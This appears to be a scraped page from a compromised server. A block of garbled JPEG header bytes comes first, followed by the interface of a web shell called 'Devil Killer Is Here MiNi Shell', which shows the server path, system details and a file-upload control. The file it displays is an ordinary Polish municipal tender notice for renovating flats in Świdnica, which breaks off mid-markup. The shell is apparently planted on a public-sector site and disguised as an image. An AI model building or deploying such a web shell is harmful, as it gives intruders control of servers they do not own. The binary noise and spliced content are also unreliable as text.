JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221102/0041855701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa lokali mieszkalnych przy ul. 1 Maja w Świdnicy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Świdnica</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Prezydent Miasta Świdnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000579589</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">74 856 28 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">74 856 87 21</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@um.swidnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.um.swidnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa lokali mieszkalnych przy ul. 1 Maja w Świdnicy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7f54fe70-5a85-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00418557</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017393/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.22 Roboty budowlane w ramach zadania pn. &#34;Przebudowa lokali przy ul. 1 Maja w Świdnicy&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umswidnica.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umswidnica.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem: https://umswidnica.eb2b.com.pl/. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>2.	Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej (dalej: „Platforma”) pod adresem: https://umswidnica.eb2b.com.pl/, która spełnia wymagania opisane w art. 64 ustawy.<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.<br/>4.	Wymagania techniczne i organizacyjne korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym https://umswidnica.eb2b.com.pl/). Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone <br/>w Regulaminie oraz uznaje go za wiążący.<br/>5.	Instrukcja korzystania z Platformy:<br/>1)	w zakładce „Postępowania”, dalej „Lista postępowań otwartych” wykonawca wybiera niniejsze postępowanie oraz korzystając z polecenia „Zgłoś się do udziału <br/>w postępowaniu” przechodzi odpowiednio do Formularza rejestracyjnego – <br/>w przypadku, kiedy wykonawca nie posiada konta na Platformie, lub panelu logowania użytkownika do Systemu w przypadku posiadania konta na Platformie;<br/>2)	po wypełnieniu formularza rejestracyjnego wykonawca otrzymuje wiadomość elektroniczną (e-mail) informującą, że może dokonać pierwszego logowania do Platformy. Rejestracja nowego konta podlega weryfikacji i akceptacji Operatora, która może potrwać do 24h (8h roboczych).<br/>3)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Platformy. Po wprowadzeniu danych użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez Platformę;<br/>4)	w zakładce „Załączniki organizatora” przedmiotowego postępowania dostępna jest dokumentacja postępowania (SWZ oraz pozostałe dokumenty). Pobranie dokumentu następuje po kliknięciu na wybrany załącznik i wciśnięciu polecenia „Pobierz”. <br/>W celu pobrania wszystkich załączników jednocześnie należy wybrać polecenie „Pobierz paczkę”, a następnie „Pobierz wszystkie załączniki organizatora”.<br/>5)	Zaleca się, aby Wykonawca na bieżąco śledził (sugerujemy codziennie) zmiany jakich w trakcie postępowania może dokonać Zamawiający. Zalecenie dotyczy również informacji jakie Zamawiający kieruje do Wykonawców po zakończeniu składania ofert.<br/>6.	Zalecenia Zamawiającego odnośnie podpisu elektronicznego:<br/>1)	odnośnie kwalifikowanego podpisu elektronicznego:<br/>	dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES,<br/>	dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>2)	odnośnie podpisu osobistego:<br/>	dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony),<br/>	dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/>3)	odnośnie podpisu zaufanego:<br/>	wielkość dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”.<br/>7.	Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 4/1 mb/s,<br/>2)	komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 8 GB, procesor dwurdzeniowy o taktowaniu min. 2,4 GHz, jeden z systemów operacyjnych: MS Windows, Mac OS, Linux, z aktualnym wsparciem technicznym producenta,<br/>3)	zainstalowana dowolna przeglądarka internetowa, w najnowszej wersji: Chrome, Safari, Edge, Firefox, Opera, <br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie „pdf”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest Prezydent Miasta Świdnicy, <br/>ul. Armii Krajowej 49, 58-100 Świdnica tel. 74 856-28-00 fax 74 856-87-21<br/>•	inspektorem ochrony danych osobowych w Gminie Miasto Świdnica kontakt: <br/>adres e-mail: iod@um.swidnica.pl , telefon 74 856-28-23*;<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Przebudowa lokali mieszkalnych przy ul. 1 Maja w Świdnicy” <br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia <br/>11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129, z późn. zm.), dalej „ustawa Pzp”; <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO **; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO<br/>________________<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">P-123/XI/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 337313,74 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia obejmuje przebudowę lokali w budynku przy ul. 1 Maja 3 w Świdnicy w ramach zadania pn.: <br/><br/>„Przebudowa lokali mieszkalnych przy ul. 1 Maja w Świdnicy”<br/><br/>2.	Szczegółowy opis i zakres przedmiotu zamówienia stanowi dokumentacja projektowa sporządzona przez ABM PROJEKT, USŁUGI PROJEKTOWE, mgr Inż. Arch. Adam Mądrzak, Boleścin 49 d, 58-100 Świdnica obejmująca Projekt Techniczny, Specyfikację Techniczną Wykonania i Odbioru Robót Budowlanych.<br/><br/>Dokumentacja w wersji papierowej jest do wglądu w siedzibie Zamawiającego – Urząd Miejski <br/>w Świdnicy, ul. Armii Krajowej nr 49, Wydział Przetargów i Inwestycji Miejskich – pok. 108.<br/><br/><br/><br/>3.	Zakres prac: <br/>a)	Roboty rozbiórkowe,<br/>b)	Roboty konstrukcyjne polegające na przebudowie pomieszczeń, remoncie schodów, <br/>c)	Roboty wykończeniowe polegające na układaniu posadzek, malowaniu ścian i sufitów <br/>i wymianie stolarki drzwiowej,<br/>d)	Roboty dociepleniowe,<br/>e)	Roboty instalacyjne sanitarne, c.o.,<br/>f)	Roboty elektryczne.<br/>4.	Załączone do dokumentacji projektowej przedmiary robót nie stanowią opisu przedmiotu zamówienia. Przedmiary robót stanowią formę informacyjną w zakresie ilości oraz technologii wykonywanych robót i są wyłącznie materiałem pomocniczym. Kalkulacja Wykonawcy winna stanowić wycenę kompletu robót niezbędnych do wykonania przedmiotu zamówienia. Przedmiarów nie należy wypełniać ani załączać do oferty.<br/>5.	Przedmiot zamówienia obejmuje kompleksowe wykonanie robót budowlanych zgodnie z wiedzą techniczną, decyzją zatwierdzającą projekt i projekt architektoniczno-budowlany i udzielającą pozwolenia na budowę nr 775/2022 z dnia 29.07.2022 r.<br/>6.	Wykonawca zobowiązuje się wykonać roboty budowlane, które nie zostały wyszczególnione w przedmiarze, a są konieczne do realizacji przedmiotu umowy zgodnie z dokumentacją projektową oraz zgodnie z obowiązującymi przepisami prawa, a w szczególności ustawą Prawo Budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz rozporządzeniami powiązanymi. <br/>7.	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy określonego w niniejszym rozdziale.<br/>8.	W przypadku rezygnacji z wykonywania pewnych robót przewidzianych w dokumentacji projektowej (&#34;robót zaniechanych&#34;), o których mowa § 1 ust. 7 wzoru umowy (załącznik nr 7) sposób obliczenia wartości tych robót zostanie wyliczony w następujący sposób:<br/>a)	w przypadku odstąpienia od całego elementu robót , nastąpi odliczenie wartości tego elementu (od ogólnej wartości przedmiotu zamówienia;<br/>b)	w przypadku odstąpienia od części robót z danego elementu, obliczenie wykonanej części tego elementu nastąpi na podstawie protokołu konieczności. <br/> Obliczenie należnego wynagrodzenia będzie odbywać się w oparciu o następujące założenia:<br/> - ceny jednostkowe robót zostaną przyjęte z zeszytów SEKOCENBUD (jako średnie) za okres ich wbudowania, a ilości wykonanych robót z dokonanego obmiaru. <br/>- Podstawą do określenia nakładów rzeczowych będą normy zawarte w przedmiarach, a w przypadku ich braku – odpowiednie pozycje Katalogów Nakładów Rzeczowych (KNR), a następnie wycena indywidualna Wykonawcy, zatwierdzona przez Zamawiającego.<br/>9.	Ponadto Wykonawca zobowiązany jest do:<br/>1)	Sporządzenia planu bezpieczeństwa i ochrony robót (plan BIOZ) przez Kierownika Budowy, ze szczególnym uwzględnieniem przeznaczenia obiektu, w terminie do dnia protokolarnego wprowadzenia na budowę.<br/>2)	Wykonania przedmiotu umowy określonego w § 1 zgodnie z warunkami umowy, dokumentacją projektową, zasadami wiedzy technicznej i obowiązującymi przepisami <br/>w szczególności techniczno – budowlanymi, normami oraz zaleceniami zawartymi <br/>w protokole przekazania placu budowy zaleceniami przedstawicieli Zamawiającego.<br/>3)	Zapewnienia właściwych warunków bezpieczeństwa i higieny pracy w miejscu robót i jego otoczeniu zgodnie z opracowanym planem BIOZ.<br/>4)	Zapewnienia przestrzegania przepisów bhp i ppoż. oraz przepisów o ochronie środowiska we wszystkich miejscach wykonywania robót i miejscach składowania materiałów, zgodnie z przepisami i dokumentacją projektową oraz zapewnienie należytego porządku na terenie budowy i w jego otoczeniu, w tym na drogach dojazdowych, usuwanie na swój koszt wszelkich śmieci, odpadów, opakowań i innych pozostałości po zużytych materiałach. W przypadku zaniechana, czynności porządkowe mogą zostać wykonane przez Zamawiającego na koszt Wykonawcy.<br/>5)	Umieszczenia na placu budowy w widocznym miejscu ogłoszenia zawierającego dane dotyczące bezpieczeństwa pracy i ochrony zdrowia.<br/>6)	Zabezpieczenia i oznakowanie prowadzonych robót oraz dbanie o stan techniczny <br/>i prawidłowość ich oznakowania przez cały okres trwania realizacji przedmiotu zamówienia.<br/>7)	Bieżącego wywozu materiałów nieużytecznych z terenu budowy na składowisko odpadów oraz i ich unieszkodliwienie, o ile będzie to konieczne;<br/>8)	Zrealizowania, we własnym zakresie i na własny koszt, tymczasowych obiektów i urządzeń na terenie placu budowy (punkt poboru wody, punkt poboru energii elektrycznej, zabezpieczenie terenu budowy). Wykonawca będzie ponosił koszty organizacji terenu budowy i zagospodarowania zaplecza budowy, zużycia wody i energii <br/>w okresie realizacji robót, koszty utrzymania i konserwacji tymczasowych obiektów, <br/>i urządzeń związanych z terenem budowy oraz innych nakładów, niestanowiących wartości robót budowlanych, a niezbędnych do wykonania przedmiotu zamówienia, w tym organizacji dojść i dojazdów do posesji w trakcie prowadzenia robót. <br/>9)	Przed przystąpieniem do wykonywania robót oraz w ich trakcie Wykonawca wykona dokumentację fotograficzną terenu inwestycji oraz terenów sąsiednich celem oddalenia ewentualnych roszczeń dotyczących uszkodzeń spowodowanych przeprowadzonymi robotami.<br/>10)	Zabezpieczenia znaków geodezyjnych przed uszkodzeniami, a w przypadku zniszczenia lub uszkodzenia odtworzenia ich na własny koszt.<br/>11)	Uporządkowania i doprowadzenia do stanu pierwotnego terenu sąsiadującego z placem budowy po zakończeniu wszystkich robót objętych zamówieniem.<br/>12)	Organizacja dojść i dojazdów do posesji w trakcie prowadzenia robót leży po stronie Wykonawcy.<br/>13)	Utrzymania w czystości dróg publicznych, po których będzie odbywał się ruch pojazdów budowy i transportujących materiały, wykonania inwentaryzacji i przeglądu stanu zerowego dróg przeznaczonych do transportu. W przypadku ewentualnych roszczeń odszkodowawczych administratorów i zarządców za zniszczenie dróg i ulic przez transport budowy Wykonawca jest zobowiązany do ich naprawy na własny koszt, który nie będzie podlegał odrębnej zapłacie i jest wliczony w cenę oferty.<br/>14)	Niezwłoczne zawiadamianie Zamawiającego o wszelkich zagrożeniach lub nowych okolicznościach wynikłych w trakcie prowadzenia robót.<br/>15)	Organizacja narad koordynacyjnych z udziałem Zamawiającego.<br/><br/>10.	Wykonawca ponosi wszelką odpowiedzialność za szkody powstałe w trakcie realizacji robót, również wobec osób trzecich oraz w wyniku nieterminowego ich naprawienia.<br/>11.	Wykonawca jest odpowiedzialny za ochronę robót i za wszelkie materiały i narzędzia używane do robót od dnia rozpoczęcia robót do dnia ich protokolarnego odbioru.<br/>12.	Wszelkie materiały, urządzenia i technologie niezbędne do wykonania przedmiotu zamówienia zostaną nabyte we własnym zakresie przez Wykonawcę. Wykonawca dostarczy materiały i zrealizuje przedmiot zamówienia przy użyciu własnych lub wypożyczonych we własnym zakresie, na własny koszt narzędzi i środków transportu.<br/>13.	Jeżeli Zamawiający zażąda badań jakości wykonanych robót, Wykonawca obowiązany jest zlecić przeprowadzenie stosownych badań lub ekspertyz niezależnemu ekspertowi. Jeżeli <br/>w rezultacie tych badań lub ekspertyz okaże się, że zastosowane materiały, urządzenia lub roboty są niezgodne z umową, koszt tych badań lub ekspertyz obciąży Wykonawcę. <br/>W przeciwnym wypadku, Zamawiający zwróci Wykonawcy poniesione przez niego koszty badań lub ekspertyz. Przed zleceniem badań lub ekspertyzy Wykonawca jest obowiązany uzyskać od Zamawiającego pisemną akceptację osoby lub firmy eksperta.<br/>14.	Zamawiający nie będzie ponosił odpowiedzialności za składniki majątkowe Wykonawcy, znajdujące się na terenie budowy w trakcie realizacji przedmiotu umowy.<br/>15.	Zamawiający w każdym czasie będzie uprawniony do przeprowadzenia kontroli prowadzonych robót lub innych czynności objętych przedmiotem zamówienia pod względem ich jakości oraz terminowości.<br/>16.	Wykonawca zobowiązany jest poddać się kontroli Zamawiającego pod kątem spełniania przez niego wymogów wskazanych w ustawie z dnia 11 stycznia 2018 roku <br/>o elektromobilności i paliwach alternatywnych, w tym do sprawdzania czy Wykonawca, przy wykonywaniu umowy, rzeczywiście użytkuje odpowiednią ilość pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 